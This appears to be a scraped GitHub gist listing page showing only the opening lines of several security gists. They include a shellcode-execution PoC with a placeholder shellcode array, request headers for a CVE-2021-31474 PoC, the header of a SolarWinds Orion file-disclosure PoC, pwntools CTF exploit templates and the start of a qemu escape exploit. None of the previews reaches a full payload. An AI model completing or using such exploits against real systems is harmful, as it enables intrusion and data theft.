https://chromium.googlesource.com/chromiumos/platform/crosvm
https://www.collabora.com/news-and-blog/blog/2017/11/09/quick-hack-experiments-with-crosvm/
You can also bypass this and use installed ubuntu kernel image on your ubuntu.
cm cokesme
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // native code exec PoC via Game Script - @carrot_c4k3 (exploits.forsale) | |
| // | |
| // sample shellcode: mov rax, 0x1337; ret; | |
| // drop your own shellcode inplace here | |
| let shellcode = [0x48,0xC7,0xC0,0x37,0x13,0x00,0x00,0xC3] | |
| // hex printing helper functions | |
| let i2c_map = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'] | |
| let c2i_map = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'A': 0xA, 'B': 0xB, 'C': 0xC, 'D': 0xD, 'E': 0xE, 'F': 0xF} |
testanull
/ PoC_CVE-2021–31474.json
Created
May 25, 2021 10:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/Action/TestAction HTTP/1.1 | |
| Host: <target> | |
| Content-Length: 3978 | |
| Accept: application/json, text/javascript, */*; q=0.01 | |
| X-XSRF-TOKEN: <token> | |
| X-Requested-With: XMLHttpRequest | |
| ViewLimitationID: 0 | |
| User-Agent: Mozilla/5.0 | |
| Content-Type: application/json; charset=UTF-8 | |
| Cookie: <cookie> |
0xsha
/ Solarwinds_Orion_LFD.py
Last active
September 24, 2024 05:28
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
rpw
/ find_baseaddr.py
Created
October 22, 2020 14:24
Find base addresses of flat firmware binaries using differences between string references
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Reverse engineering tricks: | |
| # Determine load addresses using differences between string references | |
| # (c) 2017 Comsecuris UG | |
| from idc import * | |
| from idautils import * | |
| from sets import Set | |
| ATTEMPTS = 10 |
fluxchief
/ Real track.sv
Created
September 3, 2019 09:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| module top( | |
| input [19:0] a, | |
| input [19:0] b, | |
| output res | |
| ); | |
| wire [39:0] mres; | |
| assign mres = a * b; | |
| assign res = (mres == 40'd149824246667) && a < b; | |
| // 238247 * 628861 | |
| endmodule |
drew-gpf
/ hyperdetect.c
Last active
November 6, 2025 18:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //this requires being able to run at kernel mode and assumes you're using MSVC | |
| //this also uses an unnamed structure for cr0_t, which is a nonstandard extension of the C language | |
| //data structure for cr0 | |
| typedef union _cr0_t | |
| { | |
| struct | |
| { | |
| uint64_t protection_enable : 1; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # libc = ELF('') | |
| elf = ELF('./kamikaze') | |
| context(os='linux', arch=elf.arch) | |
| # context(log_level='debug') # output verbose log |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # libc = ELF('') | |
| elf = ELF('./hash_man') | |
| context(os='linux', arch=elf.arch) | |
| # context(log_level='debug') # output verbose log |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Exploit for the EC3 qemu escape challenge of Defcon CTF Qualifiers 2018 | |
| // | |
| // Also see https://kitctf.de/writeups/hitb2017/babyqemu | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| #include <fcntl.h> | |
| #include <inttypes.h> |
NewerOlder